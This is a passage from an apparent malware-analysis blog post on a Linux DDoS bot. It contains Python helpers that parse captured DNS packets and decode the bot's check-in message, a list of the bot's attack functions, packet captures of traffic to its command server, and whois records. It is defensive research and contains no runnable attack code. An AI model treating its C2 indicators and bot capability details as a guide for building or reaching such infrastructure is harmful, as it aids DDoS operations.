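    """Decode a DNS name at `off`, following RFC 1035 compression pointers.

    Returns (name, offset just past the name as it is written at `off`).
    """
    labels = []
    while True:
        if off >= len(pkt):
            raise ValueError("name runs past end of packet")
        length = pkt[off]
        if length == 0:                       # root label terminates the name
            off += 1
            break
        if length & 0xC0 == 0xC0:             # 11xxxxxx: pointer into the packet
            if off + 1 >= len(pkt):
                raise ValueError("truncated compression pointer")
            if depth > 8:
                raise ValueError("compression pointer loop")
            ptr = struct.unpack_from("!H", pkt, off)[0] & 0x3FFF
            tail, _ = _read_name(pkt, ptr, depth + 1)
            labels.append(tail)
            off += 2
            break
        if off + 1 + length > len(pkt):
            raise ValueError("truncated label")
        labels.append(pkt[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    return ".".join(l for l in labels if l), off


def parse_dns(pkt):
    """Parse a DNS message; tolerant of captures cut short (as strace does).

    `ancount` is what the header promised, `answers` what could be decoded,
    and `truncated_capture` is set when bytes ran out before the two agreed.
    """
    if len(pkt) < 12:
        raise ValueError("shorter than a DNS header")
    ident, flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", pkt, 0)
    out = {"id": ident, "is_response": bool(flags & 0x8000), "rcode": flags & 0xF,
           "qdcount": qd, "ancount": an, "questions": [], "answers": [],
           "truncated_capture": False}
    off = 12
    try:
        for _ in range(qd):
            name, off = _read_name(pkt, off)
            qtype, qclass = struct.unpack_from("!HH", pkt, off)
            off += 4
            out["questions"].append((name, QTYPE_NAMES.get(qtype, qtype), qclass))
        for _ in range(an):
            name, off = _read_name(pkt, off)
            rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
            off += 10
            if off + rdlen > len(pkt):
                raise ValueError("truncated rdata")
            if rtype == 1 and rdlen == 4:
                value = ".".join(str(b) for b in pkt[off:off + 4])
            elif rtype == 5:
                value, _ = _read_name(pkt, off)
            else:
                value = pkt[off:off + rdlen].hex()
            off += rdlen
            out["answers"].append((name, QTYPE_NAMES.get(rtype, rtype), ttl, value))
    except (ValueError, struct.error):
        out["truncated_capture"] = True
    return out


# The two buffers exactly as strace printed them (octal escapes mean the same
# in a Python bytes literal as in C): the 31-byte query, and the response cut
# at 32 bytes by strace's default string limit.
QUERY = b"\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1"
RESPONSE_TRUNCATED = b"\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"

# Constructed sample (not from the capture): a complete response with one A
# record that uses a compression pointer back to the question name and a
# private placeholder address, so the answer-decoding path runs offline.
RESPONSE_CONSTRUCTED = (b"\x99\x0b\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"
                        b"\x03www\x05baidu\x03com\x00\x00\x01\x00\x01"
                        b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04\xc0\xa8\x00\x01")

if __name__ == "__main__":
    for label, pkt in (("query", QUERY), ("response (strace-truncated)", RESPONSE_TRUNCATED),
                       ("response (constructed)", RESPONSE_CONSTRUCTED)):
        print(label, parse_dns(pkt))
```

Transaction ID 0x990b appears in both buffers, which is how you pair the sendto() with its recvfrom() when a trace has several sockets in flight; the 74-byte reply length with ANCOUNT=2 is consistent with a CNAME plus an A record, though the bytes to confirm that were never printed.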

// compile/compat traces:

0x0124CC0  GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)
0x0124CED  GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)

// Sources:

 'crtstuff.c'
 'Fake.cpp'
 'Global.cpp'
 'main.cpp'
 'Manager.cpp'
 'ProtocolUtil.cpp'
 'ServerIP.cpp'
 'StatBase.cpp'
 'ThreadAttack.cpp'
 'ThreadAttackKernal.cpp'
 'ThreadHostStatus.cpp'
 'ThreadTaskManager.cpp'
 'ThreadTimer.cpp'
 'AutoLock.cpp'
 'FileOp.cpp'
 'Log.cpp'
 'Md5.cpp'
 'Media.cpp'
 'NetBase.cpp'
 'ThreadCondition.cpp'
 'Thread.cpp'
 'ThreadMutex.cpp'
 'Utility.cpp'

// The ThreadAttack.cpp file in particular provides key functions for some
// nasty looking attacks:

CThreadAttack::ProcessMain(void)
CThreadAttack::EmptyConnectionAtk(CSubTask &)
CThreadAttack::HttpAtk(CSubTask &) 
CThreadAttack::FakeUserAtk(CSubTask &)
CThreadAttack::Stop(void)  
CThreadAttack::DomainInitEx(CRandArray &,char  const*)  
CThreadAttack::DomainRandEx(CRandArray &,int &) 
CThreadAttack::CrossPkt(int) 
CThreadAttack::~CThreadAttack() 
CThreadAttack::CThreadAttack(CManager *)
CThreadAttack::Start(CCmdMessage *)
CThreadAttack::InitCrossPkts(std::vector..
CThreadAttack::PktAtk(CSubTask &,std::vector..

// 1. (heading lost in extraction; the capture below is the connection from local port 48417 to 180.76.3.151:80, the same local port as the getsockname() call above)
http [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=895351513 TSecr=0 WS=128
180.76.3.151    x.x.x.x TCP 74  http > 48417 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1440 SACK_PERM=1
x.x.x.x 180.76.3.151    TCP 54  48417 > http [RST] Seq=1 Win=0 Len=0

// 2. Send data back to CnC:

x.x.x.x 61.147.103.21   TCP 455 33911 > 54460 [PSH, ACK] Seq=1 Ack=1 Win=14720 Len=401

00000000  b8 0b 00 00 00 4e 2e 25  45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
00000010  ea 4c 69 6e 75 78 20 33  2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
00000020  6d 64 36 34 00 00 00 00  00 00 00 00 00 00 00 00 md64.... ........
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000190  00                                               .
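Added example, not from the original analysis: the dump above turned back into bytes and the identifiable fields pulled out with Python. The field layout is inferred from this one sample (and labelled as such in the code): the two little-endian uint16 values at offsets 13 and 15 are the 10000:60000 port range the fake.cfg PoC held, a NUL-terminated uname string of the sandbox kernel starts at offset 17, and the rest of the 401 bytes is zero padding.

```python
import re
import struct

# One dump line: 8-hex-digit offset, then up to 16 "xx" pairs, then the ASCII
# column. Capping at 16 pairs keeps ASCII text such as "EN" or "ea" out of the data.
HEXLINE = re.compile(r"^\s*([0-9A-Fa-f]{8})\s+((?:[0-9A-Fa-f]{2}\s+){1,16})")


def hexdump_to_bytes(text):
    """Rebuild raw bytes from a Wireshark/tcpdump-style hex dump.

    Offsets are verified against the running byte count so a missing,
    duplicated or re-wrapped line is caught instead of silently shifting
    every field that follows it.
    """
    out = bytearray()
    for line in text.splitlines():
        m = HEXLINE.match(line)
        if not m:
            continue                      # blank line or non-dump text
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"line offset {offset:#x} but {len(out)} bytes decoded so far")
        out += bytes.fromhex(m.group(2))
    return bytes(out)


def parse_checkin(blob):
    """Pull the recognisable fields out of the 401-byte check-in.

    Layout inferred from this single sample, not from source: the two
    little-endian uint16 at offsets 13 and 15 carry the 10000:60000 the
    fake.cfg PoC held, the two 4-byte fields at 5..12 sit where the IP:IP
    line would go (left undecoded here), and a NUL-terminated uname string
    starts at offset 17. The leading 5 bytes are not identified.
    """
    if len(blob) < 18:
        raise ValueError("too short to be this check-in")
    port_lo, port_hi = struct.unpack_from("<HH", blob, 13)
    end = blob.index(b"\x00", 17)
    return {
        "length": len(blob),
        "head": blob[:5].hex(),
        "port_range": (port_lo, port_hi),
        "uname": blob[17:end].decode("ascii", errors="replace"),
        "zero_padded": not any(blob[end:]),   # rest of the message is all NUL
    }


# The PSH/ACK payload exactly as dumped above (401 bytes).
CHECKIN_DUMP = """\
00000000  b8 0b 00 00 00 4e 2e 25  45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
00000010  ea 4c 69 6e 75 78 20 33  2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
00000020  6d 64 36 34 00 00 00 00  00 00 00 00 00 00 00 00 md64.... ........
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000190  00                                               .
"""

if __name__ == "__main__":
    print(parse_checkin(hexdump_to_bytes(CHECKIN_DUMP)))
```

A kernel version string sitting in an otherwise NUL-padded 401-byte PSH to a high port on the CnC is the kind of fixed content a network signature can key on; the offset check in hexdump_to_bytes is there because copy-pasted dumps lose or duplicate lines more often than you would expect.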

----
#MalwareMustDie!
/* This analysis post is dedicated to all UNIX sysadmins */

Full copy here: http://pastebin.com/949Y8a3g

Domain and IP analysis

Interestingly (or not), the attack in this instance came from the same IP we saw hosting the files, which is also the IP of the CNC. The system itself appears to be a machine hosted out of Jiangsu Province, China.

Here’s what we could see on the web-based file explorer:

(photo supplied by MalwareMustDie)

After I had retrieved MOST of the files, it appears they noticed and then deleted everything (hey guys! lol)

There is a domain pointing to our CNC/hosting/attack IP (as seen in the massive shell script): pingyan-china.com

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name:pingyan-china.com
Registry Domain ID:
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:http://www.xinnet.com
Updated Date:2013-09-30 00:38:42
Creation Date:2013-09-30 00:33:31
Registrar Registration Expiration Date:2014-09-30 00:33:31
Registrar:XINNET TECHNOLOGY CORPORATION
Registrar IANA ID:120
Registrar Abuse Contact Email:supervision@xinnet.com
Registrar Abuse Contact Phone:+86.1087128064
Domain Status:ok
Registry Registrant ID:
Registrant Name:Wang ShanShi
Registrant Organization:fdgf fggh
Registrant Street:gghjkj  ddfgh dddf
Registrant City:chengdu
Registrant State/Province:Sichuan
Registrant Postal Code:310400
Registrant Country:China
Registrant Phone:+86.028 89908908
Registrant Phone Ext:
Registrant Fax:+86.028 78789090
Registrant Fax Ext:
Registrant Email:280954460@qq.com
Registry Admin ID:
Admin Name:fdgf fggh
Admin Organization:fdgf fggh
Admin Street:gghjkj  ddfgh dddf
Admin City:chengdu
Admin State/Province:Sichuan
Admin PostalCode:310400
Admin Country:China
Admin Phone:+86.028 89908908
Admin Phone Ext:
Admin Fax:+86.028 78789090
Admin Fax Ext:
Admin Email:280954460@qq.com
Registry Tech ID:
Tech Name:fdgf fggh
Tech Organization:fdgf fggh
Tech Street:gghjkj  ddfgh dddf
Tech City:chengdu
Tech State/Province:Sichuan
Tech PostalCode:310400
Tech Country:China
Tech Phone:+86.028 89908908
Tech Phone Ext:
Tech Fax:+86.028 78789090
Tech Fax Ext:
Tech Email:280954460@qq.com
Name Server:dxdns.ybnic.com
Name Server:dxdns2.ybnic.com
Name Server:ltdns.ybnic.com
Name Server:gwdns.ybnic.com
DNSSEC:unsigned

As you can see in the whois, this is likely to not be a legitimate registration, unless Wang Shanshi works at a company called ‘fdgf fggh’ at the address of ‘gghjkj ddfgh dddf, Sichuan, CN.’

(Or Mr Shanshi is a lazy bastard at typing.)

Google couldn’t help me with that one…

The IP 61.147.103.21 itself is familiar to me:

inetnum:        61.147.0.0 - 61.147.255.255
netname:        CHINANET-JS
descr:          CHINANET jiangsu province network
descr:          China Telecom
descr:          A12,Xin-Jie-Kou-Wai Street
descr:          Beijing 100088
country:        CN
admin-c:        CH93-AP
tech-c:         CJ186-AP
mnt-by:         MAINT-CHINANET
mnt-lower:      MAINT-CHINANET-JS
mnt-routes:     maint-chinanet-js
changed:        hostmaster@ns.chinanet.cn.net 20020209
changed:        hostmaster@ns.chinanet.cn.net 20030306
status:         ALLOCATED non-PORTABLE
source:         APNIC

role:           CHINANET JIANGSU
address:        260 Zhongyang Road,Nanjing 210037
country:        CN
phone:          +86-25-86588231
phone:          +86-25-86588745
fax-no:         +86-25-86588104
e-mail:         ip@jsinfo.net
remarks:        send anti-spam reports to spam@jsinfo.net
remarks:        send abuse reports to abuse@jsinfo.net
remarks:        times in GMT+8
admin-c:        CH360-AP
tech-c:         CS306-AP
tech-c:         CN142-AP
nic-hdl:        CJ186-AP
remarks:        www.jsinfo.net
notify:         ip@jsinfo.net
mnt-by:         MAINT-CHINANET-JS
changed:        dns@jsinfo.net 20090831
changed:        ip@jsinfo.net 20090831
changed:        hm-changed@apnic.net 20090901
source:         APNIC
changed:        hm-changed@apnic.net 20111114

person:         Chinanet Hostmaster
nic-hdl:        CH93-AP
e-mail:         anti-spam@ns.chinanet.cn.net
address:        No.31 ,jingrong street,beijing
address:        100032
phone:          +86-10-58501724
fax-no:         +86-10-58501724
country:        CN
changed:        dingsy@cndata.com 20070416
changed:        zhengzm@gsta.com 20140227
mnt-by:         MAINT-CHINANET
source:         APNIC

This doesn’t surprise me; ranges in 61.147.0.0/16 are known for malicious traffic. In particular I’ve spotted the entire 61.147.51.0/24 range SSH brute-forcing a lot of IPs at once. Someone has some serious resources going into this shit.

Quick Update!

Seems after deleting everything off their webserver, they decided to upload something new.

Check out the following VirusTotal Result and MMD’s comments with some quick RE notes :)

https://www.virustotal.com/en/file/6dd946e821df59705dcfeb79fab810336d0ee497fd715fb5b6711e05c0428f4d/analysis/

It seems this DDoS binary needs root access on the host system to run properly, which is why the shell script tries to root the system it has targeted.

More to come!

Thanks to:

MalwareMustDie for ELF Analysis and Research.

These random Chinese guys for leaving their toys for me to find :)

My work for allowing me to do cool shit like this for a hobby.